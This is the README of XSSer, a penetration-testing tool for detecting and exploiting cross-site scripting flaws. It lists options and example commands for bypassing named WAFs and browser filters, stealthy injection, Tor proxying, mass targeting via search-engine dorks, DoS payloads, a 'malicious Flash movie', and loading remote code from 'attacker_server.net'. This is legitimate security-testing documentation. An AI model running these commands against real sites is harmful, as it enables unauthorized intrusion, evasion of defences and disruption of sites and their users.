xsser/doc/README

================================================================
Introduction:
==============================

Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.

================================================================
Current Version:
==============================

XSSer v1.8[4]: "The Hiv€!" (2010/2021) // [https://xsser.03c8.net]

================================================================
Options and features:
==============================
 
Usage: 

xsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]
[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}

Cross Site "Scripter" is an automatic -framework- to detect, exploit and
report XSS vulnerabilities in web-based applications.

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -s, --statistics      show advanced statistics output results
  -v, --verbose         active verbose mode output results
  --gtk                 launch XSSer GTK Interface
  --wizard              start Wizard Helper!

  *Special Features*:
    You can set Vector(s) and Bypasser(s) to build complex scripts for XSS
    code embedded. XST allows you to discover if target is vulnerable to
    'Cross Site Tracing' [CAPEC-107]:

    --imx=IMX           IMX - Create an image with XSS (--imx image.png)
    --fla=FLASH         FLA - Create a flash movie with XSS (--fla movie.swf)
    --xst=XST           XST - Cross Site Tracing (--xst http(s)://host.com)

  *Select Target(s)*:
    At least one of these options must to be specified to set the source
    to get target(s) urls from:

    --all=TARGET        Automatically audit an entire target
    -u URL, --url=URL   Enter target to audit
    -i READFILE         Read target(s) urls from file
    -d DORK             Search target(s) using a query (ex: 'news.php?id=')
    -l                  Search from a list of 'dorks'
    --De=DORK_ENGINE    Use this search engine (default: DuckDuckGo)
    --Da                Search massively using all search engines

  *Select type of HTTP/HTTPS Connection(s)*:
    These options can be used to specify which parameter(s) we want to use
    as payload(s). Set 'XSS' as keyword on the place(s) that you want to
    inject:

    -g GETDATA          Send payload using GET (ex: '/menu.php?id=XSS')
    -p POSTDATA         Send payload using POST (ex: 'foo=1&bar=XSS')
    -c CRAWLING         Number of urls to crawl on target(s): 1-99999
    --Cw=CRAWLER_WIDTH  Deeping level of crawler: 1-5 (default: 2)
    --Cl                Crawl only local target(s) urls (default: FALSE)

  *Configure Request(s)*:
    These options can be used to specify how to connect to the target(s)
    payload(s). You can choose multiple:

    --head              Send a HEAD request before start a test
    --cookie=COOKIE     Change your HTTP Cookie header
    --drop-cookie       Ignore Set-Cookie header from response
    --user-agent=AGENT  Change your HTTP User-Agent header (default: SPOOFED)
    --referer=REFERER   Use another HTTP Referer header (default: NONE)
    --xforw             Set your HTTP X-Forwarded-For with random IP values
    --xclient           Set your HTTP X-Client-IP with random IP values
    --headers=HEADERS   Extra HTTP headers newline separated
    --auth-type=ATYPE   HTTP Authentication type (Basic, Digest, GSS or NTLM)
    --auth-cred=ACRED   HTTP Authentication credentials (name:password)
    --check-tor         Check to see if Tor is used properly
    --proxy=PROXY       Use proxy server (tor: http://localhost:8118)
    --ignore-proxy      Ignore system default HTTP proxy
    --timeout=TIMEOUT   Select your timeout (default: 30)
    --retries=RETRIES   Retries when connection timeout (default: 1)
    --threads=THREADS   Maximum number of concurrent requests (default: 5)
    --delay=DELAY       Delay in seconds between each request (default: 0)
    --tcp-nodelay       Use the TCP_NODELAY option
    --follow-redirects  Follow server redirection responses (302)
    --follow-limit=FLI  Set limit for redirection requests (default: 50)

  *Checker Systems*:
    These options are useful to know if your target is using filters
    against XSS attacks:

    --hash              Send a hash to check if target is repeating content
    --heuristic         Discover parameters filtered by using heuristics
    --discode=DISCODE   Set code on reply to discard an injection
    --checkaturl=ALT    Check reply using: <alternative url> [aka BLIND-XSS]
    --checkmethod=ALTM  Check reply using: GET or POST (default: GET)
    --checkatdata=ALD   Check reply using: <alternative payload>
    --reverse-check     Establish a reverse connection from target to XSSer

  *Select Vector(s)*:
    These options can be used to specify injection(s) code. Important if
    you don't want to inject a common XSS vector used by default. Choose
    only one option:

    --payload=SCRIPT    OWN   - Inject your own code
    --auto              AUTO  - Inject a list of vectors provided by XSSer

  *Select Payload(s)*:
    These options can be used to set the list of vectors provided by
    XSSer. Choose only if required:

    --auto-set=FZZ_NUM  ASET  - Limit of vectors to inject (default: 1293)
    --auto-info         AINFO - Select ONLY vectors with INFO (default: FALSE)
    --auto-random       ARAND - Set random to order (default: FALSE)

  *Anti-antiXSS Firewall rules*:
    These options can be used to try to bypass specific WAF/IDS products
    and some anti-XSS browser filters. Choose only if required:

    --Phpids0.6.5       PHPIDS (0.6.5) [ALL]
    --Phpids0.7         PHPIDS (0.7) [ALL]
    --Imperva           Imperva Incapsula [ALL]
    --Webknight         WebKnight (4.1) [Chrome]
    --F5bigip           F5 Big IP [Chrome + FF + Opera]
    --Barracuda         Barracuda WAF [ALL]
    --Modsec            Mod-Security [ALL]
    --Quickdefense      QuickDefense [Chrome]
    --Sucuri            SucuriWAF [ALL]
    --Firefox           Firefox 12 [& below]
    --Chrome            Chrome 19 & Firefox 12 [& below]
    --Opera             Opera 10.5 [& below]
    --Iexplorer         IExplorer 9 & Firefox 12 [& below]

  *Select Bypasser(s)*:
    These options can be used to encode vector(s) and try to bypass
    possible anti-XSS filters. They can be combined with other techniques:

    --Str               Use method String.FromCharCode()
    --Une               Use Unescape() function
    --Mix               Mix String.FromCharCode() and Unescape()
    --Dec               Use Decimal encoding
    --Hex               Use Hexadecimal encoding
    --Hes               Use Hexadecimal encoding with semicolons
    --Dwo               Encode IP addresses with DWORD
    --Doo               Encode IP addresses with Octal
    --Cem=CEM           Set different 'Character Encoding Mutations'
                        (reversing obfuscators) (ex: 'Mix,Une,Str,Hex')

  *Special Technique(s)*:
    These options can be used to inject code using different XSS
    techniques and fuzzing vectors. You can choose multiple:

    --Coo               COO - Cross Site Scripting Cookie injection
    --Xsa               XSA - Cross Site Agent Scripting
    --Xsr               XSR - Cross Site Referer Scripting
    --Dcp               DCP - Data Control Protocol injections
    --Dom               DOM - Document Object Model injections
    --Ind               IND - HTTP Response Splitting Induced code

  *Select Final injection(s)*:
    These options can be used to specify the final code to inject on
    vulnerable target(s). Important if you want to exploit 'on-the-wild'
    the vulnerabilities found. Choose only one option:

    --Fp=FINALPAYLOAD   OWN    - Exploit your own code
    --Fr=FINALREMOTE    REMOTE - Exploit a script -remotely-

  *Special Final injection(s)*:
    These options can be used to execute some 'special' injection(s) on
    vulnerable target(s). You can select multiple and combine them with
    your final code (except with DCP exploits):

    --Anchor            ANC  - Use 'Anchor Stealth' payloader (DOM shadows!)
    --B64               B64  - Base64 code encoding in META tag (rfc2397)
    --Onm               ONM  - Use onMouseMove() event
    --Ifr               IFR  - Use <iframe> source tag
    --Dos               DOS  - XSS (client) Denial of Service
    --Doss              DOSs - XSS (server) Denial of Service

  *Reporting*:
    --save              Export to file (XSSreport.raw)
    --xml=FILEXML       Export to XML (--xml file.xml)

  *Miscellaneous*:
    --silent            Inhibit console output results
    --alive=ISALIVE     Set limit of errors before check if target is alive
    --update            Check for latest stable version

================================================================
Commands and examples:
==============================

---------------------------------------

* View HELP (Available commands):
 
  xsser -h (--help)

----------------------------------------

* Check for latest stable version:

  xsser --update

----------------------------------------

* Launch GTK interface (GUI):

  xsser --gtk

----------------------------------------

* Simple injection from URL:

  xsser -u "https://target.com/XSS"

----------------------------------------

* Simple injection from File, with Tor proxy and spoofing HTTP Referer headers

  xsser -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "127.0.0.1"

----------------------------------------

* Multiple injections from URL, with automatic payloading, establishing a reverse connection and showing statistics:

  xsser -u "https:/target.com/XSS" --auto --reverse-check -s

----------------------------------------

* Multiple injections from URL, with automatic payloading, using Tor proxy, using "Hexadecimal" encoding, with verbose output and saving results to file (XSSreport.raw):

  xsser -u "https://target.com/XSS" --auto --proxy "http://127.0.0.1:8118" --Hex --verbose --save

----------------------------------------

* Multiple injections from URL, with automatic payloading, using character encoding mutations (first, changing payload to 'Hexadecimal'; second, changing to 'StringFromCharCode' the first one; third, reencoding to 'Hexadecimal' the second one), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):

  xsser -u "https://target.com/XSS" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer Pentesting Tool" --timeout "20" --threads "5"

----------------------------------------

* Advanced injection from File, payloading your -own- code and using Unescape() character encoding to bypass filters:

  xsser -i "urls.txt" --payload "<script>alert('XSSed');</script>" --Une

----------------------------------------

* Injection from Dork, selecting "DuckDuckGo" as search engine:

  xsser --De "duck" -d "search.php?q="

----------------------------------------

* Injection from a list of Dorks extracted from a file (provided by XSSer) and using all search engines supported (XSSer Storm!):

  xsser -l --Da 

----------------------------------------

* Injection from Crawler with deep 2 and 200 pages to review (XSSer Spider!):

  xsser -c 200 --Cw=2 -u "https://target.com"

----------------------------------------

* Simple injection from URL, to a POST parameter (ex: password), with statistics results:

  xsser -u "https://target.com/login.php" -p "username=admin&password=XSS" -s

----------------------------------------

* Multiple injections (with hex and int hashes) to multiple parameters on a single URLG and using GET:

  xsser -u "https://target.com" -g "login.php?=usernameXSS&password=XSS&captcha=X1S" --auto

----------------------------------------

* Simple injection from URL, using GET, injecting on Cookie, trying to use DOM shadow space (no server logging!) and if exists any vulnerability, exploiting your -own- final code:

  xsser -u "https://target.com" -g "/news.asp?page=XSS" --Coo --Anchor --Fp="<script>alert('XSSed');</script>"

----------------------------------------

* Simple injection from URL, using GET and if exists any vulnerability, exploit a DoS (Denegation Of Service):

  xsser -u "https://target.com" -g "/news.asp?page=XSS" --Dos

----------------------------------------

* Multiple injections to multiple places, extracting targets from a File, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between requests to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and Cookies, using proxy Tor, with IP Octal obfuscation, with statistics results and using verbose mode (real player mode!): 

  xsser -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose 

----------------------------------------

* Injection of a XSS code provided by user on a -fake- image (ready to be uploaded to your public profile):<br><br>

  xsser --Imx "test.png" --payload="<script>alert('XSSed');</script>"

----------------------------------------

* Report dorking search (using all search engines) to a XML file:

  xsser -d "login.php" --Da --xml "security_report_XSSer_Dork_login-php_allengines.xml" 

----------------------------------------

* Create a malicious Flash movie :

  xsser --fla "INFECTED_movie.swf"

----------------------------------------

* Send a pre-checking hash to search for false -false positives-:

  xsser -u "https://target.com" --hash

----------------------------------------

* Discover parameters filtered on your target using heuristics:

  xsser -u "https://target.com" --heuristic

----------------------------------------

* Exploiting Base64 code encoding in META tag (rfc2397), just after inject a manual payload:
 
  xsser -u "https://target.com" -g "/index.php?id=XSS" --payload="<script>alert('XSSed');</script>" --B64

----------------------------------------

* Exploiting your "own" -remote code- after discover a vulnerability using automatic fuzzing:<br><br>
 
  xsser -u "https://target.com" -g "/index.php?id=XSS" --auto --Fr "https://attacker_server.net/exploits/XSS/code.js"</b><br>

----------------------------------------

* Apply Anti-antiXSS bypassers (ex: Imperva) before to inject you -own- code with verbose output:

  xsser -u "https://target.com" -g "/index.php?id=XSS" --Imperva --payload="<script>alert('XSSed');</script>" -v

----------------------------------------

* Search also "XSSer" on the Internet for more videos and tutorials...

  [...]